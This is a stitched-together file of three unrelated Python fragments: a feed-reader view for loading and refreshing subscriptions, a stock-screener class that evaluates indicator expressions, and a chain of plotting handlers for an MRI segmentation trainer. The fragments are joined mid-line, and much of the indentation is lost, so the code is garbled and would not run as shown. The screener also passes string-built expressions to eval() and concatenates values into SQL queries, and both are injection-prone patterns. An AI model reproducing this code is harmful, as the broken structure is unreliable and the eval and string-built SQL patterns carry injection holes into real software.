            sub.calculate_feed_scores(silent=True)
        feeds[sub.feed_id] = sub.canonical(include_favicon=include_favicons)
        # Queue feeds that are inactive (without a known exception),
        # have no active subscribers, or are overdue for an update.
        if not sub.feed.active and not sub.feed.has_feed_exception:
            scheduled_feeds.append(sub.feed.pk)
        elif sub.feed.active_subscribers <= 0:
            scheduled_feeds.append(sub.feed.pk)
        elif sub.feed.next_scheduled_update < day_ago:
            scheduled_feeds.append(sub.feed.pk)
    if include_inactive:
        for sub in inactive_subs:
            inactive_feeds[sub.feed_id] = sub.canonical(include_favicon=include_favicons)
    if len(scheduled_feeds) > 0 and request.user.is_authenticated():
        logging.user(request, "~SN~FMTasking the scheduling immediate fetch of ~SB%s~SN feeds..." %
                     len(scheduled_feeds))
        ScheduleImmediateFetches.apply_async(kwargs=dict(feed_ids=scheduled_feeds, user_id=user.pk))
    flat_folders = []
    flat_folders_with_inactive = []
    if folders:
        flat_folders = folders.flatten_folders(feeds=feeds)
        flat_folders_with_inactive = folders.flatten_folders(feeds=feeds,
                                                             inactive_feeds=inactive_feeds)
    social_params = {
        'user_id': user.pk,
        'include_favicon': include_favicons,
        'update_counts': update_counts,
    }
    social_feeds = MSocialSubscription.feeds(**social_params)
    social_profile = MSocialProfile.profile(user.pk)
    social_services = MSocialServices.profile(user.pk)
    starred_counts, starred_count = MStarredStoryCounts.user_counts(user.pk, include_total=True)
    # Counts collection may be stale/empty; fall back to a direct count.
    if not starred_count and len(starred_counts):
        starred_count = MStarredStory.objects(user_id=user.pk).count()
    # Offer category suggestions only to users without subscriptions.
    categories = None
    if not user_subs:
        categories = MCategory.serialize()
    logging.user(request, "~FB~SBLoading ~FY%s~FB/~FM%s~FB/~FR%s~FB feeds/socials/inactive ~FMflat~FB%s" % (
        len(feeds.keys()), len(social_feeds), len(inactive_feeds), '. ~FCUpdating counts.' if update_counts else ''))
    data = {
        "flat_folders": flat_folders,
        "flat_folders_with_inactive": flat_folders_with_inactive,
        "feeds": feeds if not include_inactive else {"0": "Don't include `include_inactive=true` if you want active feeds."},
        "inactive_feeds": inactive_feeds if include_inactive else {"0": "Include `include_inactive=true`"},
        "social_feeds": social_feeds,
        "social_profile": social_profile,
        "social_services": social_services,
        "user": user.username,
        "user_id": user.pk,
        "is_staff": user.is_staff,
        "user_profile": user.profile,
        "iphone_version": iphone_version,
        "latest_ios_build": latest_ios_build,
        "latest_ios_version": latest_ios_version,
        "categories": categories,
        'starred_count': starred_count,
        'starred_counts': starred_counts,
        'share_ext_token': user.profile.secret_token,
    }
    return data
@ratelimit(minutes=1, requests=10)
@never_cache
@json.json_view
def refresh_feeds(request):
start = datetime.datetime.now()
user = get_user(request)
feed_ids = request.REQUEST.getlist('feed_id')
check_fetch_status = request.REQUEST.get('check_fetch_status')
favicons_fetching = request.REQUEST.getlist('favicons_fetching')
social_feed_ids = [feed_id for feed_id in feed_ids if 'social:' in feed_id]
feed_ids = list(set(feed_ids) - set(social_feed_ids))
feeds = {}
if feed_ids or (not social_feed_ids and not feed_ids):
feeds = UserSubscription.feeds_with_updated_counts(user, feed_ids=feed_ids,
check_fetch_status=check_fetch_status)
checkpoint1 = datetime.datetime.now()
social_feeds = {}
if social_feed_ids or (not social_feed_ids and not feed_ids):
social_feeds = MSocialSubscription.feeds_with_updated_counts(user, social_feed_ids=social_feed_ids)
checkpoint2 = datetime.datetime.now()
favicons_fetching = [int(f) for f in favicons_fetching if f]
feed_icons = {}
if favicons_fetching:
feed_icons = dict([(i.feed_id, i) for i in MFeedIcon.objects(feed_id__in=favicons_fetching)])
for feed_id, feed in feeds.items():
if feed_id in favicons_fetching and feed_id in feed_icons:
feeds[feed_id]['favicon'] = feed_icons[feed_id].data
feeds[feed_id]['favicon_color'] = feed_icons[feed_id].color
feeds[feed_id]['favicon_fetching'] = feed.get('favicon_fetching')
user_subs = UserSubscription.objects.filter(user=user, active=True).only('feed')
sub_feed_ids = [s.feed_id for s | |
if results[k] is None:
results[k] = True
if v[0] == 6: #'reached high/low'
if v[3] is None:
v[3] = 1
period = getOffset(v[2].strip().lower(), v[1][0])
name = v[1][0] + ' ' + v[1][1]
for i in range(1, v[3]+1):
if indicators[name] is None or len(indicators[name]) <= i+period:
results[k] = False
break
value1 = getIndicatorValue(indicators, v[1], i)
value2 = [getIndicatorValue(indicators, v[1], i+j) for j in range(period)]
if 'high' in v[2]:
result = (value1 >= max(value2))
else:
result = (value1 <= min(value2))
if result:
results[k] = True
break
if results[k] is None:
results[k] = False
if v[0] == 99: #formed Candlestick Pattern
name = v[2]
if 'candlestick pattern' in name:
isPatternFound = False
sortedByRankMap = sorted(cp_mapping.items(), key=lambda x: x[1][2])
if name == 'bullish candlestick pattern':
cs_patterns = (kc.lower() for kc,vc in sortedByRankMap if len(vc[0]) > 0 and vc[1] > 0)
elif name == 'bearish candlestick pattern':
cs_patterns = (kc.lower() for kc,vc in sortedByRankMap if len(vc[0]) > 0 and vc[1] < 0)
else:
cs_patterns = (kc.lower() for kc,vc in sortedByRankMap if len(vc[0]) > 0 and vc[1] == 0)
for cs_pattern in cs_patterns: #sorted by performance rank
isPatternFound = isCandlestickPatternFound(cs_pattern, v[3], dataframe[v[1]], cp_mapping)
if isPatternFound:
break
results[k] = isPatternFound
else:
results[k] = isCandlestickPatternFound(name, v[3], dataframe[v[1]], cp_mapping)
#logger.debug(k + ' = ' + str(results[k]))
except Exception as e:
logger.error(f'{symbol[0]}: {traceback.format_exc()}')
return None
return results
    @staticmethod
    def sceener(symbol, expression, timeframes, translation):
        """Evaluate the screener expression for a single symbol.

        Returns the raw results mapping for top/bottom-N screeners
        (translation codes 7/8), ``symbol`` when the boolean expression
        evaluates truthy, and ``None`` when it is falsy or evaluation
        fails.

        NOTE(review): the name looks like a typo for "screener", but it
        is kept since callers reference this spelling.
        """
        # Workers may run in separate processes; drop inherited pooled
        # DB connections so each process reconnects on its own.
        utils.engine.dispose()
        result = False
        results = MyScreener.getResults(symbol, timeframes, translation)
        logger.debug(results)
        # Top-N / bottom-N screeners return their raw per-symbol values
        # so the caller can rank across symbols.
        if len(translation) == 1 and list(translation.values())[0][0] in [7, 8]:
            return results
        if results is not None:
            #logger.debug('expression: ' + expression)
            # Substitute each statement's boolean result into the textual
            # expression, then normalize brackets and newlines for eval().
            newexpression = expression
            for k, v in results.items():
                newexpression = newexpression.replace(k, str(v))
            newexpression = newexpression.replace('[', '(').replace(']', ')').replace('\r', ' ').replace('\n', ' ')
            #logger.debug('newexpression: ' + newexpression)
            try:
                # SECURITY NOTE(review): eval() of the assembled expression
                # is only safe while expressions come from trusted input.
                result = eval(newexpression)
            except Exception as e:
                logger.error(f'{newexpression}: {traceback.format_exc()}')
                return None
        logger.debug(f'{symbol}: {str(result)}')
        return symbol if result else None
    @staticmethod
    def calculateIndicator(timeframe, function, dataframe):
        """Compute one technical indicator series for a timeframe.

        ``function`` is either a bare price column name ('open', 'high',
        'low', 'close', 'volume') or an indicator call like 'sma(20)'.
        Returns a ``(canonical_name, series)`` tuple; on evaluation
        failure the series is the close column zeroed out.  Raises when
        the indicator name is not in TA_MAPPING.
        """
        np.seterr(all='warn')
        # Plain price columns need no computation.
        if function.lower() in ['open', 'high', 'low', 'close', 'volume']:
            return (function, dataframe[timeframe][function])
        # Split "name(params..." into the indicator name and its args.
        i = function.find('(')
        name = function[:i]
        parameters = function[i+1:]
        result = None
        for k, v in TA_MAPPING.items():
            if name.lower() == k:
                # Build a call string: v[0] is the implementing function,
                # v[1:-1] are the dataframe columns it consumes.
                x = v[0] + '('
                for j in range(1, len(v)-1):
                    x += "dataframe['" + timeframe + "']['" + v[j] + "'],"
                if len(parameters) > 1:
                    key = name.lower()
                    if 'macd' in key: #swap 1st and 2nd arguments for MACD to conform to the usual order of parameters
                        parameters = parameters[:-1].split(',')
                        if key == 'macd':
                            x += parameters[1] + ',' + parameters[0] + ')'
                        else:
                            x += parameters[1] + ',' + parameters[0] + ',' + parameters[2] + ')'
                    else:
                        # User-supplied args already end with ')'.
                        x += parameters
                else:
                    # No args: drop the trailing comma and close the call.
                    x = x[:-1] + ')'
                #print(x)
                try:
                    # SECURITY NOTE(review): eval() of a string-built call;
                    # safe only while TA_MAPPING and inputs are trusted.
                    result = eval(x)
                except Exception as e:
                    logger.error(f'{x}: {traceback.format_exc()}')
                    # Fall back to an all-zero series shaped like close.
                    result = dataframe[timeframe]['close']
                    result.values[:] = 0
                return (k + function[i:], result)
        errorMessage = f'{name} is undefined in ta_mapping'
        logger.error(errorMessage)
        raise Exception(errorMessage)
    def checkExpression(self, expression):
        """Validate a screener expression by translating it and running
        it once against a known symbol ('SPY').

        Returns the statement->translation mapping when the expression
        contains at least one statement; implicitly returns None when
        no statements are found.
        """
        logger.debug('expression: ' + expression)
        #start = timer()
        statements = self.__separate(expression)
        if len(statements) > 0:
            translation = {}
            for statement in statements:
                logger.debug('statement: ' + statement)
                translation[statement] = self.__translate(statement)
                logger.debug('translated: ' + str(translation[statement]))
            #end = timer()
            #logger.debug(f'translation done in {str(100*(end-start))} ms')
            timeframes = self.getTimeframes(translation)
            symbol = 'SPY' #['FSZ-DBA.TO', 204] #this is a test case for exception
            #start = timer()
            # Dry-run the expression; the result itself is discarded.
            result = MyScreener.sceener(symbol, expression, timeframes, translation)
            #end = timer()
            #logger.debug(f'got result in {str(100*(end-start))} ms')
            #if len(translation) == 1 and list(translation.values())[0][0] in [7, 8]:
            #    logger.debug(result)
            #else:
            #    result = result is not None
            #    logger.debug(f'result: {str(result)}')
            return translation
    def getTimeframes(self, translationMap):
        """Collect, per timeframe, the maximum lookback needed by any
        translated statement.

        Returns a dict mapping timeframe key -> largest duration seen.
        Translation tuples are positional: code 99 (candlestick) stores
        the timeframe at [1] and duration at [-1]; codes 7/8 (top/bottom)
        carry an indicator spec at [2]; all other codes carry it at [1],
        with an optional second spec at [2]/[3] for comparisons (code 2).
        """
        timeframes = {}
        for translation in translationMap.values():
            if translation[0] == 99:
                # Candlestick patterns default to a 1-bar duration.
                duration = translation[-1]
                if duration is None:
                    duration = 1
                if translation[1] not in timeframes:
                    timeframes[translation[1]] = duration
                elif duration > timeframes[translation[1]]:
                    timeframes[translation[1]] = duration
            elif translation[0] in [7, 8]:
                if translation[2][0] not in timeframes:
                    timeframes[translation[2][0]] = translation[2][-1]
                elif translation[2][-1] > timeframes[translation[2][0]]:
                    timeframes[translation[2][0]] = translation[2][-1]
            else:
                if translation[1][0] not in timeframes:
                    timeframes[translation[1][0]] = translation[1][-1]
                elif translation[1][-1] > timeframes[translation[1][0]]:
                    timeframes[translation[1][0]] = translation[1][-1]
                # Comparison-style statements can reference a second
                # indicator (and timeframe) on the right-hand side.
                if len(translation) > 3:
                    if translation[0] == 2 and type(translation[2]) is list:
                        if translation[2][0] not in timeframes:
                            timeframes[translation[2][0]] = translation[2][-1]
                        elif translation[2][-1] > timeframes[translation[2][0]]:
                            timeframes[translation[2][0]] = translation[2][-1]
                    if type(translation[3]) is list:
                        if translation[3][0] not in timeframes:
                            timeframes[translation[3][0]] = translation[3][-1]
                        elif translation[3][-1] > timeframes[translation[3][0]]:
                            timeframes[translation[3][0]] = translation[3][-1]
        return timeframes
def __getAllSymbols(self):
price = None
if self._priceType is not None and (self._priceLow is not None or self._priceHigh is not None):
if self._priceType == 0:
price = 'lastDayPrice'
elif self._priceType == 1:
price = 'avg30DayPrice'
elif self._priceType == 2:
price = 'avg60DayPrice'
elif self._priceType == 3:
price = 'avg90DayPrice'
volume = None
if self._volumeType is not None and (self._volumeLow is not None or self._volumeHigh is not None):
if self._volumeType == 0:
volume = 'lastDayVolume'
elif self._volumeType == 1:
volume = 'avg30DayVolume'
elif self._volumeType == 2:
volume = 'avg60DayVolume'
elif self._volumeType == 3:
volume = 'avg90DayVolume'
lastDate = (datetime.today() - timedelta(days=4)).strftime(utils.date_format) #take into account weekend and holidays
query = f"SELECT ticker FROM symbols WHERE active=1 and lastDate >= '{lastDate}'" #only consider symbols that are active and have price up to date
if self._symbols is not None:
query += " and ticker in (" + ', '.join(["'%s'" %symbol for symbol in self._symbols]) + ")"
if price is not None:
if self._priceLow is not None:
query += " and " + price + ">=" + str(self._priceLow)
if self._priceHigh is not None:
query += " and " + price + "<=" + str(self._priceHigh)
if volume is not None:
if self._volumeLow is not None:
query += " and " + volume + ">=" + str(self._volumeLow)
if self._volumeHigh is not None:
query += " and " + volume + "<=" + str(self._volumeHigh)
if self._industries is not None:
query += " and industry in (" + ', '.join(["'%s'" %industry for industry in self._industries.split()]) + ")"
#logger.info(query)
with contextlib.closing(utils.engine.raw_connection()) as conn:
cursor = conn.cursor()
cursor.execute(query)
rows = cursor.fetchall()
cursor.close()
return [row[0] for row in rows]
    def getMatchingSymbols(self):
        """Run the screener and return the list of matching tickers.

        Translates the expression on first use (persisting it via
        replaceTranslation), pre-filters candidates with
        __getAllSymbols(), special-cases single top/bottom IBD relative
        strength screeners with a direct SQL ranking, and otherwise
        evaluates the expression per symbol with multiprocessing.
        """
        logger.info('screener_id = ' + str(self._id))
        # Lazily translate the raw expression once and cache it.
        if self._translation is None or len(self._translation) == 0:
            if self._expression is None or len(self._expression) == 0:
                logger.info('missing expression')
                return
            logger.info('new expression to translate: ' + self._expression)
            statements = self.__separate(self._expression)
            if len(statements) == 0:
                logger.info('no valid statement')
                return
            translation = {}
            for statement in statements:
                translation[statement] = self.__translate(statement)
            logger.debug('translation: ' + str(translation))
            if len(translation) == 0:
                logger.info('no valid translation')
                return
            replaceTranslation(self._id, translation)
            self._translation = translation
        matchingSymbols = []
        symbols = self.__getAllSymbols()
        logger.info(f'#symbols: {str(len(symbols))}')
        if len(symbols) == 0:
            return matchingSymbols
        # Detect single-statement top-N (7) / bottom-N (8) screeners.
        isTop = False
        isBottom = False
        translationValue = None
        if len(self._translation) == 1:
            translationValue = list(self._translation.values())[0]
            if translationValue[0] == 7:
                isTop = True
            if translationValue[0] == 8:
                isBottom = True
        # IBD relative strength top/bottom can be ranked directly in SQL.
        if (isTop or isBottom) and type(translationValue[2]) is str: #IBDRS
            query = "SELECT ticker FROM symbols WHERE active=1 and ticker in ({}) order by ibdRelativeStrength {} limit {}" \
                .format(','.join([f"'{symbol}'" for symbol in symbols]), 'desc' if isTop else 'asc', translationValue[1])
            with contextlib.closing(utils.engine.raw_connection()) as conn:
                cursor = conn.cursor()
                cursor.execute(query)
                rows = cursor.fetchall()
                cursor.close()
            matchingSymbols = [row[0] for row in rows]
            logger.info(f'#matchingSymbols: {str(len(matchingSymbols))}')
            return matchingSymbols
        timeframes = self.getTimeframes(self._translation)
        """
        #do in single process
        for symbol in symbols:
            result = MyScreener.sceener(symbol, self._expression, timeframes, self._translation)
            if result is not None:
                matchingSymbols.append(result)
        """
        #do with multiprocessing
        # NOTE(review): this guard means the multiprocessing path only
        # runs when the defining module is executed as the main script;
        # when imported, no symbols are evaluated — confirm intended.
        if __name__ == '__main__':
            parameters = [(symbol, self._expression, timeframes, self._translation) for symbol in symbols]
            processes = mp.cpu_count() #this process is mainly cpu bound
            with mp.Pool(processes=processes) as pool:
                results = pool.starmap(MyScreener.sceener, parameters)
            if isTop:
                # Merge per-symbol value dicts and rank the top N.
                results = dict((key,d[key]) for d in results for key in d)
                matchingSymbols = heapq.nlargest(int(translationValue[1]), results, key=results.get)
            elif isBottom:
                results = dict((key,d[key]) for d in results for key in d)
                matchingSymbols = heapq.nsmallest(int(translationValue[1]), results, key=results.get)
            else:
                for result in results:
                    if result is not None:
                        matchingSymbols.append(result)
        logger.info(f'#matchingSymbols: {str(len(matchingSymbols))}')
        return matchingSymbols
def isBlank(myString):
    """Return True when *myString* is None, empty, or whitespace-only."""
    return not (myString and myString.strip())
def getOffset(text, timeframe):
if len(text) | |
"rownames": ["Background", "CSF", "GM", "WM"],
"title": "Confusion Matrix"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "iSEG Confusion Matrix", PlotType.HEATMAP_PLOT,
params={
"opts": {"columnnames": ["VM", "GM", "CSF", "Background"],
"rownames": ["Background", "CSF", "GM", "WM"],
"title": "iSEG Confusion Matrix"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "MRBrainS Confusion Matrix", PlotType.HEATMAP_PLOT,
params={"opts": {"columnnames": ["VM", "GM", "CSF", "Background"],
"rownames": ["Background", "CSF", "GM", "WM"],
"title": "MRBrainS Confusion Matrix"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "ABIDE Confusion Matrix", PlotType.HEATMAP_PLOT,
params={
"opts": {"columnnames": ["VM", "GM", "CSF", "Background"],
"rownames": ["Background", "CSF", "GM", "WM"],
"title": "ABIDE Confusion Matrix"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "Runtime", PlotType.TEXT_PLOT,
params={"opts": {"title": "Runtime"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger, "Jensen-Shannon Divergence", every=1,
params={"title": "Jensen-Shannon Divergence on test data per Epoch",
"legend": ["Inputs", "Normalized"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger,
"Hausdorff Distance per class per epoch on reconstructed iSEG image",
every=1,
params={
"title": "Hausdorff Distance per class per epoch on reconstructed iSEG image",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger,
"Hausdorff Distance per class per epoch on reconstructed MRBrainS image",
every=1,
params={
"title": "Hausdorff Distance per class per epoch on reconstructed MRBrainS image",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger,
"Hausdorff Distance per class per epoch on reconstructed ABIDE image",
every=1,
params={
"title": "Hausdorff Distance per class per epoch on reconstructed ABIDE image",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger, "Dice score per class per epoch", every=1,
params={"title": "Dice score on test patches per class per epoch",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger,
"Dice score per class per epoch on reconstructed iSEG image",
every=1,
params={
"title": "Dice score per class per epoch on reconstructed iSEG image",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger,
"Dice score per class per epoch on reconstructed MRBrainS image", every=1,
params={
"title": "Dice score per class per epoch on reconstructed MRBrainS image",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger,
"Dice score per class per epoch on reconstructed ABIDE image",
every=1,
params={
"title": "Dice score per class per epoch on reconstructed ABIDE image",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Input iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Input iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Input T2 iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Input T2 iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Normalized iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Normalized iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Segmented iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Segmented iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Ground Truth iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Ground Truth iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Initial Noise iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Initial Noise iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Augmented iSEG After Normalization",
PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Augmented iSEG After Normalization"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Augmented Input iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Augmented Input iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Input MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Input MRBrainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Input T2 MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Input T2 MRBrainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Normalized MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Normalized MRBrainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Segmented MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Segmented MRBrainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Ground Truth MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Ground Truth MRBrainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Initial Noise MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Initial Noise MRBrainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Augmented MRBrainS After Normalization",
PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Augmented MRBrainS After Normalization"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Augmented Input MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Augmented Input MRBainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Input ABIDE Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Input ABIDE Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Normalized ABIDE Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Normalized ABIDE Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Ground Truth ABIDE Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Ground Truth ABIDE Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Segmented ABIDE Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Segmented ABIDE Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger, "Per Dataset Mean Hausdorff Distance", every=1,
params={"title": "Per Dataset Mean Hausdorff Distance",
"legend": list(dataset_configs.keys())}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Per-Dataset Histograms", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True}}, every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Images Histograms", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True}}, every=5), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
Checkpoint(save_folder, monitor_fn=lambda model_trainer: model_trainer.valid_loss, delta=0.01,
mode=MonitorMode.MIN), Event.ON_EPOCH_END) \
.with_event_handler(PlotAvgGradientPerLayer(visdom_logger, every=25), Event.ON_TRAIN_BATCH_END)
return trainer
elif self._trainer == TrainerType.UNET:
trainer = UNetTrainer(training_config, model_trainers, dataloaders[0], dataloaders[1], dataloaders[2],
reconstruction_datasets, input_reconstructor,
segmentation_reconstructor, augmented_input_reconstructor, gt_reconstructor,
run_config, dataset_configs, save_folder) \
.with_event_handler(PrintTrainingStatus(every=25), Event.ON_BATCH_END) \
.with_event_handler(PrintMonitorsTable(every=25), Event.ON_BATCH_END) \
.with_event_handler(PlotMonitors(visdom_logger), Event.ON_EPOCH_END) \
.with_event_handler(PlotLR(visdom_logger), Event.ON_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Training Input Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Training Input Patches Process {}".format(
run_config.local_rank)}},
every=500), Event.ON_TRAIN_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Validation Input Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Validation Input Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_VALID_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Test Input Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Test Input Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Training Segmented Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Segmented Patches Process {}".format(
run_config.local_rank)}},
every=500), Event.ON_TRAIN_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger,
"Validation Segmented Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Validation Segmented Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_VALID_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Test Segmented Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Test Segmented Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger,
"Training Segmentation Ground Truth Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Training Ground Truth Patches Process {}".format(
run_config.local_rank)}},
every=500), Event.ON_TRAIN_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger,
"Validation Segmentation Ground Truth Batch Process {}".format(
run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Validation Ground Truth Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_VALID_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger,
"Test Segmentation Ground Truth Batch Process {}".format(
run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Test Ground Truth Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Training Label Map Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Training Label Map Patches Process {}".format(
run_config.local_rank)}},
every=500), Event.ON_TRAIN_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger,
"Validation Label Map Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Validation Label Map Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_VALID_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger,
"Test Label Map Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Test Label Map Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Input Intensity Histogram", PlotType.HISTOGRAM_PLOT,
params={
"opts": {"title": "Inputs Intensity Histogram",
"store_history": True,
"numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Background Input Intensity Histogram", PlotType.HISTOGRAM_PLOT,
